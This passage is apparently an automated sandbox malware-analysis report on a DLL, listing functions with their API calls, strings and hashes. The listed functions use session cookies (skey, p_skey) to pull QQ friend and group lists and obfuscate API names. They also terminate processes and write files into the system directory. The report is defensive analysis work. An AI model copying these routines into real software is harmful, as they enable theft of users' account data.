                                                          • Instruction ID: 4d7b8e1089b806f1553af91cc52290c17ddbfb9f59a257a9258129450cc3dc3d
                                                          • Opcode Fuzzy Hash: e4f6fa49615fa3bf4a5896043488c5a6305fc76200abcc925ed36e56fb71271d
                                                          • Instruction Fuzzy Hash: FC916C3110C3C09AE312CB68D848B9BBFD5ABA6718F084A5DF6D4462D2D7BA950CC773
                                                          Function 10013B40 Relevance: 91.5, APIs: 38, Strings: 14, Instructions: 472networkstringfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • strstr.MSVCRT ref: 10013BB7
                                                          • strstr.MSVCRT ref: 10013BCA
                                                          • strstr.MSVCRT ref: 10013BDF
                                                          • strncpy.MSVCRT ref: 10013C2B
                                                          • _itoa.MSVCRT ref: 10013C71
                                                          • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10013C8A
                                                          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 10013CB0
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013CBD
                                                          • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,80084010,00000000), ref: 10013CED
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013D00
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013D03
                                                          • sprintf.MSVCRT ref: 10013D2E
                                                          • HttpSendRequestA.WININET(00000000,?,?,?), ref: 10013D66
                                                          • HttpQueryInfoA.WININET(00000000,00000005,?,?,00000000), ref: 10013D82
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013D93
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013D96
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013D99
                                                          • atol.MSVCRT ref: 10013DB2
                                                          • #823.MFC42(00000001,?,?), ref: 10013DC0
                                                          • InternetReadFile.WININET(00000000,00000000,00000001,?), ref: 10013DE8
                                                          • #825.MFC42(00000000), ref: 10013DF3
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013E02
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013E05
                                                          • InternetCloseHandle.WININET(?), ref: 10013E0C
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013E24
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013E27
                                                          • InternetCloseHandle.WININET(?), ref: 10013E2E
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 10013E3E
                                                          • #823.MFC42(00000002), ref: 10013E4B
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 10013E75
                                                          • #825.MFC42(00000000), ref: 10013E7C
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10013E93
                                                          • #823.MFC42(00000001), ref: 10013E9F
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10013ECA
                                                          • #825.MFC42(00000000), ref: 10013ED1
                                                          • #825.MFC42(00000000,00000000,00000000), ref: 10013EDF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandle$#825ByteCharMultiWide$#823Httpstrstr$OpenRequest$ConnectFileInfoQueryReadSend_itoaatolsprintfstrncpy
                                                          • String ID: $/cgi-bin/qun_mgr/get_group_list$Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$POST$bkn=$create$gc=%u&st=0&end=1999&sort=0&%s$gmr$join$p_skey$qun.qq.com$skey=
                                                          • API String ID: 3684279964-3639289013
                                                          • Opcode ID: 990525e5488a96e8453cdc46b1721a0efc440dc8632db5c924d2235e82eb403e
                                                          • Instruction ID: faa93913a6112bf75685c4331b660b6eedd4284dd9d5a7e5e4bfb64d0fa1d1b7
                                                          • Opcode Fuzzy Hash: 990525e5488a96e8453cdc46b1721a0efc440dc8632db5c924d2235e82eb403e
                                                          • Instruction Fuzzy Hash: 97D14876A043142BE310DA689C81FAB77DDEB84760F05463DFB09A72C1EB74ED0587A6
                                                          Function 10007A80 Relevance: 91.4, APIs: 50, Strings: 2, Instructions: 423windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #356.MFC42 ref: 10007AA2
                                                          • #540.MFC42 ref: 10007AB6
                                                          • #540.MFC42 ref: 10007AC7
                                                          • #540.MFC42 ref: 10007AD8
                                                          • #540.MFC42 ref: 10007AE9
                                                            • Part of subcall function 10008080: #2614.MFC42(?,?,10007AFF), ref: 10008084
                                                            • Part of subcall function 10008080: #860.MFC42(*.*,?,?,10007AFF), ref: 10008091
                                                            • Part of subcall function 10008080: #3811.MFC42(?,*.*,?,?,10007AFF), ref: 100080B2
                                                            • Part of subcall function 10008080: #3811.MFC42(?,?,*.*,?,?,10007AFF), ref: 100080C1
                                                            • Part of subcall function 10008080: #3811.MFC42(?,?,?,*.*,?,?,10007AFF), ref: 100080D0
                                                            • Part of subcall function 10008080: #3811.MFC42(?,?,?,?,*.*,?,?,10007AFF), ref: 100080DF
                                                            • Part of subcall function 10008080: #3811.MFC42(?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080EE
                                                            • Part of subcall function 10008080: #3811.MFC42(?,?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080FD
                                                            • Part of subcall function 10011E20: #537.MFC42(?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E47
                                                            • Part of subcall function 10011E20: #940.MFC42(?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E7E
                                                            • Part of subcall function 10011E20: #535.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E8F
                                                            • Part of subcall function 10011E20: #800.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011EA5
                                                          • #858.MFC42 ref: 10007B2F
                                                          • #800.MFC42 ref: 10007B40
                                                          • #537.MFC42(*.*), ref: 10007B59
                                                          • #922.MFC42(?,?,00000000,*.*), ref: 10007B6E
                                                          • #858.MFC42(00000000,?,?,00000000,*.*), ref: 10007B80
                                                          • #800.MFC42(00000000,?,?,00000000,*.*), ref: 10007B90
                                                          • #800.MFC42(00000000,?,?,00000000,*.*), ref: 10007BA1
                                                          • #2770.MFC42(?,00000000,00000000,?,?,00000000,*.*), ref: 10007BB1
                                                          • #2781.MFC42(?,00000000,00000000,?,?,00000000,*.*), ref: 10007BCF
                                                          • #4058.MFC42 ref: 10007BEF
                                                          • #858.MFC42(?), ref: 10007C01
                                                          • #858.MFC42(?,?), ref: 10007C0E
                                                          • #858.MFC42(?,?,?), ref: 10007C1B
                                                          • #3178.MFC42(?,?,?,?), ref: 10007C8A
                                                          • #922.MFC42(?,?,00000000,?,?,?,?), ref: 10007C9D
                                                          • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 10007CAF
                                                          • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 10007CBF
                                                          • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 10007CD0
                                                          • #1980.MFC42 ref: 10007CED
                                                          • #858.MFC42(?), ref: 10007CF6
                                                          • MessageBoxA.USER32(00000000,100FA624,warning,00000000), ref: 10007D1E
                                                          • #922.MFC42(?,?,?), ref: 10007D2E
                                                          • #858.MFC42(00000000,?,?,?), ref: 10007D40
                                                          • #800.MFC42(00000000,?,?,?), ref: 10007D51
                                                          • #2770.MFC42(?,00000000,00000000,?,?,?), ref: 10007D61
                                                          • #2781.MFC42(?,00000000,00000000,?,?,?), ref: 10007D7F
                                                          • #4058.MFC42(?,00000000,00000000,?,?,?), ref: 10007D8C
                                                          • #4215.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007DAD
                                                          • #3324.MFC42(?,00000000,00000000,?,?,?), ref: 10007DC6
                                                          • #3324.MFC42(?,00000000,00000000,?,?,?), ref: 10007DE7
                                                          • #3310.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007E22
                                                          • #3010.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007E7F
                                                          • #3304.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007ED4
                                                          • #3181.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007F33
                                                          • #800.MFC42(?,?,?,?,00000000,00000000,?,?,?), ref: 10007F58
                                                          • #3181.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007F6A
                                                          • #941.MFC42(100FA614), ref: 10007F91
                                                          • #6883.MFC42(?,?), ref: 10007FA2
                                                          • #800.MFC42(?,?), ref: 10007FB3
                                                          • MessageBoxA.USER32(00000000,100FA624,warning,00000000), ref: 10007FE1
                                                          • #800.MFC42 ref: 10008015
                                                          • #800.MFC42 ref: 10008026
                                                          • #800.MFC42 ref: 10008037
                                                          • #800.MFC42 ref: 10008048
                                                          • #668.MFC42 ref: 1000805C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #800$#858$#3811$#540$#922$#2770#2781#3181#3324#4058#537Message$#1980#2614#3010#3178#3304#3310#356#4215#535#668#6883#860#940#941
                                                          • String ID: *.*$warning
                                                          • API String ID: 3130606840-3923866357
                                                          • Opcode ID: 251ad2f11a4f3d366ba395f991fd5f89db86f2f297839ac524b49303de88fe60
                                                          • Instruction ID: b1e61bf16f4b2c14380c5a5ce74a3a62fa832d31a0b46feb69f6aa117d284303
                                                          • Opcode Fuzzy Hash: 251ad2f11a4f3d366ba395f991fd5f89db86f2f297839ac524b49303de88fe60
                                                          • Instruction Fuzzy Hash: 42027F745083858BD354CF64C941FABBBE5FF98684F40492CF9DA43296EB34E909CB62
                                                          Function 1000E300 Relevance: 85.9, APIs: 9, Strings: 40, Instructions: 163libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$Eventfreemalloc
                                                          • String ID: .$0$2$3$A$A$C$D$G$K$L$N$P$P$R$S$T$W$\$a$a$a$c$d$f$h$i$l$l$l$m$n$o$p$t$t$t$t$t$u
                                                          • API String ID: 4197004350-898277365
                                                          • Opcode ID: 6844fd1aae96d6a728b9026d4df18c1478f85e5378cfbf6268743b6022a5aa55
                                                          • Instruction ID: cbdbaa2f1d889cd97fb3dca5bd1ca770dde78bd32e1b100a85a0a9dad76a714e
                                                          • Opcode Fuzzy Hash: 6844fd1aae96d6a728b9026d4df18c1478f85e5378cfbf6268743b6022a5aa55
                                                          • Instruction Fuzzy Hash: FC61596110C3C0DDE312D7A89848B8BBFD59BE6308F08499DF5C84B292C2BA921CC777
                                                          Function 10021B30 Relevance: 84.3, APIs: 24, Strings: 24, Instructions: 279libraryloadersleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32 ref: 10021B6B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021B78
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,TerminateThread), ref: 10021B8C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021B8F
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,?), ref: 10021BDB
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021BDE
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,esolC), ref: 10021C52
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021C55
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,TerminateProcess), ref: 10021C65
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021C68
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,DisconnectNamedPipe), ref: 10021C78
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021C7B
                                                          • Sleep.KERNEL32(0000000A), ref: 10021C92
                                                          • GetConsoleProcessList.KERNEL32(?,00000001), ref: 10021CB2
                                                          • #823.MFC42 ref: 10021CC3
                                                          • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 10021CD3
                                                          • GetCurrentProcessId.KERNEL32 ref: 10021CE7
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 10021CFE
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 10021D09
                                                          • CloseHandle.KERNEL32(00000000), ref: 10021D10
                                                          • #825.MFC42(00000000), ref: 10021D29
                                                          • FreeConsole.KERNEL32 ref: 10021D3B
                                                          • Sleep.KERNEL32(0000000A), ref: 10021D43
                                                          • FreeConsole.KERNEL32 ref: 10021D49
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoadProcess$Console$FreeHandleListSleep$#823#825CloseCurrentModuleOpenTerminate
                                                          • String ID: AttachConsole$C$DisconnectNamedPipe$F$KERNEL32.dll$S$TerminateProcess$TerminateThread$W$a$c$e$e$elgn$esolC$g$l$l$l$n$o$o$r$s
                                                          • API String ID: 708691324-3966567685
                                                          • Opcode ID: 22dcc9dcdef9eb33aac94f5418d72076aa39dac69a447e46f29e8e9069031d2e
                                                          • Instruction ID: 22ecc8b84f5612ae9a4b25da8054c7e915ffc6ebd0d1b6b9dc2bd0e2f752a24a
                                                          • Opcode Fuzzy Hash: 22dcc9dcdef9eb33aac94f5418d72076aa39dac69a447e46f29e8e9069031d2e
                                                          • Instruction Fuzzy Hash: 90B1B1746083949BDB20DF68CC84BDFBBE9AF95740F45481DF9889B241C7B5E904CBA2
                                                          Function 100134A0 Relevance: 80.8, APIs: 36, Strings: 10, Instructions: 348networkstringfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • strstr.MSVCRT ref: 10013514
                                                          • strstr.MSVCRT ref: 10013527
                                                          • strstr.MSVCRT ref: 1001353C
                                                          • strncpy.MSVCRT ref: 10013588
                                                          • _itoa.MSVCRT ref: 100135CE
                                                          • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 100135E7
                                                          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1001360D
                                                          • InternetCloseHandle.WININET(00000000), ref: 1001361A
                                                          • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,80084010,00000000), ref: 1001364A
                                                          • InternetCloseHandle.WININET(00000000), ref: 1001365D
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013660
                                                          • sprintf.MSVCRT ref: 1001368B
                                                          • HttpSendRequestA.WININET(00000000,?,?,?), ref: 100136C3
                                                          • HttpQueryInfoA.WININET(00000000,00000005,?,?,00000000), ref: 100136DF
                                                          • InternetCloseHandle.WININET(00000000), ref: 100136F0
                                                          • InternetCloseHandle.WININET(00000000), ref: 100136F3
                                                          • InternetCloseHandle.WININET(00000000), ref: 100136F6
                                                          • atol.MSVCRT ref: 1001370F
                                                          • #823.MFC42(00000001,?,?), ref: 1001371D
                                                          • InternetReadFile.WININET(00000000,00000000,00000001,?), ref: 10013745
                                                          • #825.MFC42(00000000), ref: 10013750
                                                          • InternetCloseHandle.WININET(00000000), ref: 1001375F
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013762
                                                          • InternetCloseHandle.WININET(?), ref: 10013769
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013781
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013784
                                                          • InternetCloseHandle.WININET(?), ref: 1001378B
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 1001379B
                                                          • #823.MFC42(00000002), ref: 100137A8
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 100137D2
                                                          • #825.MFC42(00000000), ref: 100137D9
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 100137F0
                                                          • #823.MFC42(00000001), ref: 100137FC
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10013827
                                                          • #825.MFC42(00000000), ref: 1001382E
                                                          • #825.MFC42(00000000,00000000,00000000), ref: 1001383C
                                                          Strings
                                                          • /cgi-bin/qun_mgr/get_friend_list, xrefs: 100134DB
                                                          • qun.qq.com, xrefs: 100134BB
                                                          • Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s, xrefs: 10013685
                                                          • bkn=, xrefs: 1001354D
                                                          • HTTP/1.1, xrefs: 1001363E
                                                          • , xrefs: 10013503
                                                          • skey=, xrefs: 10013521
                                                          • POST, xrefs: 10013644
                                                          • Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1), xrefs: 100134AF
                                                          • p_skey, xrefs: 100134FD
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandle$#825ByteCharMultiWide$#823Httpstrstr$OpenRequest$ConnectFileInfoQueryReadSend_itoaatolsprintfstrncpy
                                                          • String ID: $/cgi-bin/qun_mgr/get_friend_list$Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$POST$bkn=$p_skey$qun.qq.com$skey=
                                                          • API String ID: 3684279964-1003693118
                                                          • Opcode ID: 83a2f2817c2aedd7fbe9857ede55100449b32c6472bc6b786a787f71fcc3d649
                                                          • Instruction ID: a6aeb5833008578cdead13e838f5760d2c554c937ea3091131f56ecc18512e5b
                                                          • Opcode Fuzzy Hash: 83a2f2817c2aedd7fbe9857ede55100449b32c6472bc6b786a787f71fcc3d649
                                                          • Instruction Fuzzy Hash: 4FA137726003146BE314DA788C41FAB7BDDFBC4320F044629FA59E72C0DEB4A9058B95
                                                          Function 10008600 Relevance: 79.0, APIs: 2, Strings: 43, Instructions: 223fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,771A83C0,1001F1D6), ref: 1001B666
                                                            • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                            • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                          • DeleteFileA.KERNEL32(00000001,?,00000001,00000001,?,00000001,00000001,00000001), ref: 1000874C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressDeleteFileHandleLibraryLoadModuleProc
                                                          • String ID: .$2$3$4$4$6$6$E$E$F$K$L$N$R$R$R$R$W$W$a$c$d$d$i$i$i$l$l$n$n$o$o$o$open$r$r$r$s$t$t$v$w$w
                                                          • API String ID: 357481036-173339048
                                                          • Opcode ID: b35eb0abf191cff89a94c78c48ed883a63f7157c3257380d681e420933c49f90
                                                          • Instruction ID: b2534d6be5788ef259c749724872d3f87395c9b78c17d96c33da540c7ee2e7e0
                                                          • Opcode Fuzzy Hash: b35eb0abf191cff89a94c78c48ed883a63f7157c3257380d681e420933c49f90
                                                          • Instruction Fuzzy Hash: 5B91291010C3C0D9E356C668848871FBED6ABA668CF48598DB1C95B287C6BF961CC77B
                                                          Function 10022070 Relevance: 70.3, APIs: 34, Strings: 6, Instructions: 329librarysleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(KERNEL32.dll,AttachConsole), ref: 10022086
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10022093
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,WriteFile), ref: 100220A1
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100220A8
                                                          • Sleep.KERNEL32(0000000A), ref: 100220F7
                                                          • GetConsoleProcessList.KERNEL32(?,00000001), ref: 10022117
                                                          • #823.MFC42 ref: 1002212C
                                                          • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 1002213C
                                                          • GetCurrentProcessId.KERNEL32 ref: 1002215C
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 10022173
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 10022182
                                                          • CloseHandle.KERNEL32(00000000), ref: 10022185
                                                          • #825.MFC42(00000000), ref: 100221B0
                                                          • FreeConsole.KERNEL32 ref: 100221BE
                                                          • Sleep.KERNEL32(0000000A), ref: 100221C6
                                                          • FreeConsole.KERNEL32 ref: 100221CC
                                                            • Part of subcall function 10010BA0: SetEvent.KERNEL32(?,10017547), ref: 10010BA4
                                                          • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 1002233F
                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 10022383
                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 100223A7
                                                          • CloseHandle.KERNEL32(00000000), ref: 100223B2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
